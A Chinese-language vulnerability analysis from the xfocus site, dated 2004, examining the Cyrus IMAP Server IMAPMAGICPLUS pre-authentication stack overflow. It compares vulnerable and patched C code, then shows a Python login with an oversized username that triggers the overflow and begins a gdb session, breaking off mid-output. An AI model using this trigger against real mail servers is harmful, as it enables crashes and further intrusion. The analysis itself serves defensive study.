📄 759.html
字号:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Cyrus IMAP Server IMAPMAGICPLUS预验证远程缓冲区溢出漏洞分析 </title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<meta name="Keywords" content="安全焦点, xfocus, 陷阱网络, honeynet, honeypot, 调查取证, forensic, 入侵检测, intrusion detection, 无线安全, wireless security, 安全论坛, security forums, 安全工具, security tools, 攻击程序, exploits, 安全公告, security advisories, 安全漏洞, security vulnerabilities, 安全教程, security tutorials, 安全培训, security training, 安全帮助, security help, 安全标准, security standards, 安全代码, security code, 安全资源, security resources, 安全编程, security programming, 加密, cryptography," />
<link rel="stylesheet" href="../../css/plone.css" type="text/css">
</head>
<body bgcolor="#FFFFFF" text="#000000">
<div class="top">
<div class="searchBox">
<form name="searchform" action="http://www.google.com/search" method="get">
<input type="hidden" name="domains" value="www.xfocus.net">
<input type="hidden" name="sitesearch" value="www.xfocus.net">
<input type="text" name="q" size="20">
<input type="submit" name="btnG" value="Google Search">
</form>
</div>
<img src="../../images/logo.gif" border="0" width="180" height="80" alt="xfocus logo">
<img src="../../images/title.gif" border="0" width="230" height="20" alt="xfocus title">
</div>
<div class="tabs">
<a href="../../index.html" class="plain">首页</a>
<a href="../../releases/index.html" class="plain">焦点原创</a>
<a href="../../articles/index.html" class="selected">安全文摘</a>
<a href="../../tools/index.html" class="plain">安全工具</a>
<a href="../../vuls/index.html" class="plain">安全漏洞</a>
<a href="../../projects/index.html" class="plain">焦点项目</a>
<a href="https://www.xfocus.net/bbs/index.php?lang=cn" class="plain">焦点论坛</a>
<a href="../../about/index.html" class="plain">关于我们</a>
</div>
<div class="personalBar">
<a href='https://www.xfocus.net/php/add_article.php'>添加文章</a> <a href='http://www.xfocus.org/'>English Version</a>
</div>
<table class="columns">
<tr>
<td class="left">
<div class="box">
<h5> 文章分类 </h5>
<div class="body">
<div class="content odd">
<div style="white-space: nowrap;">
<img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/4.html'>专题文章</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/2.html'><b>漏洞分析 <<</b></a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/3.html'>安全配置</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/1.html'>黑客教学</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/5.html'>编程技术</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/7.html'>工具介绍</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/6.html'>火墙技术</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/8.html'>入侵检测</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/9.html'>破解专题</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/11.html'>焦点公告</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/12.html'>焦点峰会</a><br>
</div>
</div>
</div>
</div>
<div class="box">
<h5> 文章推荐 </h5>
<div class="body">
<div class="content odd">
<img src='../../images/document_icon.gif' border='0'> <a href='../../articles/200408/733.html'>补丁管理最佳安全实践之资产评估</a><br><img src='../../images/document_icon.gif' border='0'> <a href='../../articles/200404/689.html'>国内网络安全风险评估市场与技术操作</a><br><img src='../../images/document_icon.gif' border='0'> <a href='../../articles/200410/743.html'>协作的信息系统风险评估</a><br>
</div>
</div>
</div>
</td>
<td class="main">
<h1>Cyrus IMAP Server IMAPMAGICPLUS预验证远程缓冲区溢出漏洞分析</h1><br>创建时间:2004-12-06<br>文章属性:原创<br>文章提交:<a href='https://www.xfocus.net/bbs/index.php?lang=cn&act=Profile&do=03&MID=2'>san</a> (san_at_xfocus.org)<br><br>Cyrus IMAP Server IMAPMAGICPLUS预验证远程缓冲区溢出漏洞分析<br />
<br />
Stefan Esser发现了Cyrus IMAP Server的四个漏洞,其中IMAPMAGICPLUS预验证远程缓冲区溢出漏洞最危险,也最容易利用。本小节主要介绍对此漏洞的分析。<br />
<br />
1 定位漏洞<br />
<br />
通过比较imapd.c源文件的Cyrus IMAP Server 2.2.8和2.2.9版本,可以很快发现问题代码出现在imapd_canon_user函数:<br />
<br />
if (config_getswitch(IMAPOPT_IMAPMAGICPLUS)) {<br />
/* make a working copy of the auth[z]id */<br />
memcpy(userbuf, user, ulen);<br />
userbuf[ulen] = '\0';<br />
user = userbuf;<br />
<br />
userbuf是imapd_canon_user函数的一个局部变量,大小是MAX_MAILBOX_NAME+1,也就是491。user是imapd_canon_user函数带入的参数,并没有做长度检查,当IMAPOPT_IMAPMAGICPLUS选项打开的时候会执行memcpy操作,导致栈溢出,函数返回地址将被覆盖。在Cyrus IMAP Server 2.2.9版本的代码做了如下的修补:<br />
<br />
if (config_getswitch(IMAPOPT_IMAPMAGICPLUS)) {<br />
/* make a working copy of the auth[z]id */<br />
if (ulen > MAX_MAILBOX_NAME) {<br />
sasl_seterror(conn, 0, "buffer overflow while canonicalizing");<br />
return SASL_BUFOVER;<br />
}<br />
memcpy(userbuf, user, ulen);<br />
userbuf[ulen] = '\0';<br />
user = userbuf;<br />
<br />
可以看到这是一个非常典型的栈溢出漏洞。<br />
<br />
2 触发漏洞<br />
<br />
虽然很容易就找到问题代码,但重要的是找出触发该漏洞的方法。首先得安装一个存在此漏洞的Cyrus IMAP Server,安装过程参见Cyrus的文档,本文不再详述。安装完以后在/etc/imapd.conf的最后加上如下行:<br />
<br />
imapmagicplus: 1<br />
<br />
这样就打开了IMAPMAGICPLUS选项,然后启动服务。user变量就是用户输入的用户名,那么尝试用python脚本登陆Cyrus IMAP Server:<br />
<br />
[san@ /home/san/bugtrack]> python<br />
Python 2.3.2 (#1, Nov 19 2003, 15:32:26)<br />
[GCC 2.96 20000731 (Red Hat Linux 7.1 2.96-98)] on linux2<br />
Type "help", "copyright", "credits" or "license" for more information.<br />
>>> import imaplib<br />
>>> M = imaplib.IMAP4("192.168.7.100")<br />
>>> M.login("A"*1024, "")<br />
<br />
执行login之前,在另一个终端可以看到有个imapd进程被fork出来,用gdb调试器attach上这个进程:<br />
<br />
[root@ /home/san/bugtrack]> ps aux|grep imapd<br />
cyrus 27258 0.0 0.5 20796 1496 ? S 16:39 0:00 imapd<br />
[root@ /home/san/bugtrack]> gdb /usr/cyrus/bin/imapd 27258<br />
GNU gdb Red Hat Linux (5.1-1)<br />
Copyright 2001 Free Software Foundation, Inc.<br />
GDB is free software, covered by the GNU General Public License, and you are<br />
welcome to change it and/or distribute copies of it under certain conditions.<br />
Type "show copying" to see the conditions.<br />
There is absolutely no warranty for GDB. Type "show warranty" for details.<br />
This GDB was configured as "i386-redhat-linux"...<br />
/home/san/bugtrack/27258: No such file or directory.<br />
Attaching to program: /usr/cyrus/bin/imapd, process 27258<br />
Reading symbols from /usr/local/lib/libsasl2.so.2...done.<br />
Loaded symbols for /usr/local/lib/libsasl2.so.2<br />
Reading symbols from /lib/libssl.so.2...done.<br />
Loaded symbols for /lib/libssl.so.2<br />
Reading symbols from /lib/libcrypto.so.2...done.<br />
Loaded symbols for /lib/libcrypto.so.2<br />
Reading symbols from /lib/libresolv.so.2...done.<br />
Loaded symbols for /lib/libresolv.so.2<br />
Reading symbols from /lib/libdb-3.2.so...done.<br />
Loaded symbols for /lib/libdb-3.2.so<br />
Reading symbols from /lib/libcom_err.so.2...done.<br />
Loaded symbols for /lib/libcom_err.so.2<br />
Reading symbols from /lib/libnsl.so.1...done.<br />
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -